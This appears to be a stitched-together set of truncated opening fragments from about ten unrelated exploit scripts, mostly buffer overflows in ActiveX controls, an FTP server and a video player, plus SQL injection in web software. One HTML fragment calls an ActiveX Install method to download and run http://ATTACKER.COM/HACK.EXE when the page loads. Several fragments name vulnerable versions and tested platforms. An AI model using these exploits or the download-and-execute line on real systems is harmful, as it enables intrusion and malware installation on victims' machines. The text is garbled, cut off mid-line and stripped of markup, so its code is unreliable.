?php // 0x48k-ymj by ... // based on /5043 // Bug discovered by Krystian Kloskowski (h07) h07@interia.pl function unescape($s){ $res=strtoupper(bin2hex($s)); $g = round(strlen($res)/4); if ($g != (strlen($res)/4))$res.=00; $out = ; for ($i=0; $istrle
!-- Sejoong Namo ActiveSquare6 NamoInstaller.dll BoF Exploit Written by http://www.Plan-S.cn Tested on Windows XP SP2(fully patched) Korean, IE6, NamoInstaller.dll version 3,0,0,1 -- html object classid=clsid:AF465549-1D22-4140-A273-386FA8877E0A id=t
#Titan FTP SERVER REMOTE HEAP OVERFLOW(USER/PASS) #Impact : Critical # # Windbg Output: #(bec.528): Access violation - code c0000005 (first chance) #First chance exceptions are reported before any exception handling. #This exception may be expected a
/*0day Total Video Player V1.03 .m3u file Local Buffer Overflow In this exploit you chose to bind a port or to spawn calc.exe. After I crafted a playlist I observed that the stack got corrupted. The corruption accured in some points,and overwriten a
!-- MySpace Uploader Buffer Overflow Exploit written by e.b. Tested on Windows XP SP2(fully patched) English, IE6 MySpaceUploader.ocx version 1.0.0.4: {48DD0448-9209-4F81-9F6D-D83562940134} Aurigma ImageUploader4.ocx version version 4.5.70.0: {6E5E16
#!/usr/bin/perl ## ibProArcade = v3.3.0 sql injection exploit ## (c)oded by 1dt.w0lf ## RST/GHC ## THIS IS UNPUBLISHED RST/GHC EXPLOIT CODE ## KEEP IT PRIVATE use Tk; use Tk::BrowseEntry; use Tk::DialogBox; use LWP::UserAgent; BEGIN { if($^O eq 'MSWi
? # WordPress WassUp plugin v 1.4.3 Sql Injection Exploit # # Plugin Homepage-http://www.wpwp.org/ # # Found by:enter_the_dragon # # Tested successfully on v 1.4-1.4.3 # (lower versions are possibly vulnerable too just check the source and modify the
body bgcolor=#000000 p align=centerbfont face=Verdana color=#00FF00 size=2Chilkat Mail ActiveX 7.8 (ChilkatCert.dll) Insecure Method Exploit/font/b/p p align=centerbfont face=Verdana size=2 color=#00FF00Site : a href=http://www.chilkatsoft.comfont co
!-- Persits XUpload 3.0 AddFile() Buffer Overflow Exploit Vulnerability discovered by David Kierznowski written by e.b. Tested on Windows XP SP2(fully patched) English, IE6, xupload.ocx 3.0.0.4 Thanks to David, h.d.m. and the Metasploit crew -- html
html head html head titleNamo Web Editor NamoInstaller.dll install Method Exploit/title script language=JavaScript defer function Check() { obj.Install(http://ATTACKER.COM/HACK.EXE) } /script /head body onload=JavaScript: return Check(); object id=ob